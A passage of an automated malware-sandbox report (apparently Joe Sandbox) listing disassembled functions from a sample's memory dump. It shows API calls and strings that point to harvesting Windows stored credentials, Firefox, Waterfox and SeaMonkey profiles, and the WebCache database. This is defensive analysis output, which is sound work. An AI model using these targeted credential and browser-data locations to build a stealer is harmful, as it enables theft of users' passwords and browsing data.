  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
• CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• wcslen.MSVCRT ref: 0040BE06
• _wcsncoll.MSVCRT ref: 0040BE38
• memset.MSVCRT ref: 0040BE91
• memcpy.MSVCRT ref: 0040BEB2
• _wcsnicmp.MSVCRT ref: 0040BEFC
• wcschr.MSVCRT ref: 0040BF24
• LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
• String ID:
• API String ID: 3191383707-0
• Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
• Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
• Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
• Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00403CBF
• memset.MSVCRT ref: 00403CD4
• memset.MSVCRT ref: 00403CE9
• memset.MSVCRT ref: 00403CFE
• memset.MSVCRT ref: 00403D13
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403DDA
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Waterfox$Waterfox\Profiles
• API String ID: 3527940856-11920434
• Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
• Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
• Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
• Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00403E50
• memset.MSVCRT ref: 00403E65
• memset.MSVCRT ref: 00403E7A
• memset.MSVCRT ref: 00403E8F
• memset.MSVCRT ref: 00403EA4
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403F6B
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 3527940856-2068335096
• Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
• Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
Uniqueness
• Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403FE1
                                                                                              • memset.MSVCRT ref: 00403FF6
                                                                                              • memset.MSVCRT ref: 0040400B
                                                                                              • memset.MSVCRT ref: 00404020
                                                                                              • memset.MSVCRT ref: 00404035
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 004040FC
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                              • API String ID: 3527940856-3369679110
                                                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                              • API String ID: 3510742995-2641926074
                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                              • memcpy.MSVCRT ref: 004033D0
                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                              • String ID: $0.@
                                                                                              • API String ID: 3030842498-1896041820
                                                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 2941347001-0
                                                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403C09
                                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcscat$Closewcscpywcslen
                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                              • API String ID: 3249829328-1174173950
                                                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040A824
                                                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • wcscpy.MSVCRT ref: 0040A854
                                                                                              • wcscat.MSVCRT ref: 0040A86A
                                                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 669240632-0
                                                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                              • String ID: "%s"
                                                                                              • API String ID: 1343145685-3297466227
                                                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                                              • API String ID: 1714573020-3385500049
                                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004087D6
                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                              • memset.MSVCRT ref: 00408828
                                                                                              • memset.MSVCRT ref: 00408840
                                                                                              • memset.MSVCRT ref: 00408858
                                                                                              • memset.MSVCRT ref: 00408870
                                                                                              • memset.MSVCRT ref: 00408888
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 2911713577-0
                                                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp
                                                                                              • String ID: @ $SQLite format 3
                                                                                              • API String ID: 1475443563-3708268960
                                                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                              • memset.MSVCRT ref: 00414C87
                                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                              • API String ID: 2705122986-2036018995
                                                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmpqsort
                                                                                              • String ID: /nosort$/sort
                                                                                              • API String ID: 1579243037-1578091866
                                                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040E60F
                                                                                              • memset.MSVCRT ref: 0040E629
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Strings
                                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                              • API String ID: 3354267031-2114579845
                                                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                              • API String ID: 2221118986-1725073988
                                                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                              Uniqueness

